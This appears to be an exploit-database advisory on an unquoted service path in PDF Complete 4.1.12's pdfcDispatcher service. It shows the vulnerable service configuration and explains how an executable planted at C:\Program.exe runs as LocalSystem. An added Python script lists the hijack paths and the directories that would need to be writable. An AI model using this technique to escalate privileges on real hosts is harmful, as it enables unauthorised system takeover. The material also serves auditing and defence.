Full title: PDF Complete Office Edition 4.1.12 - Unquoted Service Path Privilege Escalation Exploit
Category: local exploits
Platform: windows

Exploit Title : PDF_complete_corporate_edition.rb - 'Unquoted Service Path Privilege Escalation'
PDF Version : 4.1.12
Vulnerability discovered by : Joey Lane
Module Author : pedr0 Ubuntu [r00t-3xp10it]
Tested on : Windows 7 Professional
Software Link : http://www.pdfcomplete.com/cms/Downloads.aspx

"This was tested on version 4.1.12, but other versions may be affected as well."

Description:
PDF Complete Corporate Edition installs the service pdfcDispatcher with an unquoted BINARY_PATH_NAME that contains spaces. Because the path is not quoted, the Service Control Manager cannot tell where the executable name ends, so Windows tries each space-delimited prefix of the path as an executable (C:\Program.exe first) before reaching the intended pdfsvc.exe. The service is configured to start automatically and runs as LocalSystem, so this is a local privilege escalation: a local attacker who can create a file in one of the directories along that path (C:\ or C:\Program Files (x86)\) places an executable there, and the next reboot or service restart runs it as LocalSystem instead of the real service binary.

Note that exploitation depends on the attacker having write access to one of those intermediate directories. On a default Windows 7 install a standard user can create folders but not files directly in C:\, so check the effective ACLs (for example with icacls) before relying on this; the unquoted path is only the first half of the bug. Restarting the service requires the SERVICE_START right, which ordinary users normally lack, so a reboot is the realistic trigger.

---------------------------------------------------------------------------
C:\>sc qc pdfcDispatcher
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: pdfcDispatcher
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\PDF Complete\pdfsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PDF Document Manager
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------

EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named "Program.exe" placed in "C:\" would be executed as the Local System user the next time the service was started (after a reboot or a service restart), because "C:\Program.exe" is the first candidate Windows tries when resolving the unquoted path.

# 0day.today @ http://0day.today/
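The following script is an added illustration and is not part of the advisory or of the Metasploit module it names. It parses `sc qc` output of the shape shown above and enumerates, in order, the executables Windows will try before the real one, applying the documented CreateProcess rule for unquoted paths with spaces (split at every space, append ".exe" to a prefix whose last component has no extension). The `sc qc` text is a constructed copy of the listing in the advisory, and the function and field names are the author's own; it handles paths without trailing arguments only, which is the case here.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample input: the `sc qc pdfcDispatcher` listing from the
# advisory, re-typed here so the script runs offline (not captured live).
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: pdfcDispatcher
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\PDF Complete\pdfsvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : PDF Document Manager
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# One `sc qc` field per line: NAME : value (value may be empty).
FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")


def parse_sc_qc(text):
    """Turn `sc qc <name>` output into a dict of FIELD_NAME -> value."""
    config = {}
    for line in text.splitlines():
        match = FIELD_RE.match(line)
        if match:
            config[match.group(1)] = match.group(2).strip()
    return config


def hijack_candidates(binary_path):
    """
    List the executables the Service Control Manager (via CreateProcess)
    looks for, in order, before the intended one when BINARY_PATH_NAME is
    unquoted and contains spaces: the string is cut at each space, and
    '.exe' is appended when the prefix's last component has no extension.
    Returns [] for a quoted path or one without spaces (not affected).
    Assumption: no command-line arguments follow the image path, which is
    true for the advisory's service; without quotes they are indistinguishable.
    """
    path = binary_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    words = path.split(" ")
    candidates = []
    # Every prefix ending just before a space is tried before the full path.
    for i in range(1, len(words)):
        prefix = " ".join(words[:i])
        if not PureWindowsPath(prefix).suffix:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def assess_service(sc_output):
    """Summarise one service's exposure from its `sc qc` output."""
    cfg = parse_sc_qc(sc_output)
    candidates = hijack_candidates(cfg.get("BINARY_PATH_NAME", ""))
    return {
        "service": cfg.get("SERVICE_NAME", ""),
        "runs_as": cfg.get("SERVICE_START_NAME", ""),
        "auto_start": "AUTO_START" in cfg.get("START_TYPE", ""),
        "unquoted": bool(candidates),
        # For each candidate, the directory an attacker must be able to
        # create a file in for the hijack to work.
        "drop_points": [(c, str(PureWindowsPath(c).parent)) for c in candidates],
    }


if __name__ == "__main__":
    report = assess_service(SC_QC_OUTPUT)
    print(f"{report['service']} runs as {report['runs_as']}, "
          f"auto_start={report['auto_start']}, unquoted={report['unquoted']}")
    for exe, directory in report["drop_points"]:
        print(f"  would run {exe}  (needs a writable {directory})")
```

For the advisory's path the report lists `C:\Program.exe`, `C:\Program Files.exe` and `C:\Program Files (x86)\PDF.exe` ahead of pdfsvc.exe. On a live host, feed it the real `sc qc` output and then check the listed directories with `icacls`: the service is only exploitable from an unprivileged account if one of them grants that account file-creation rights.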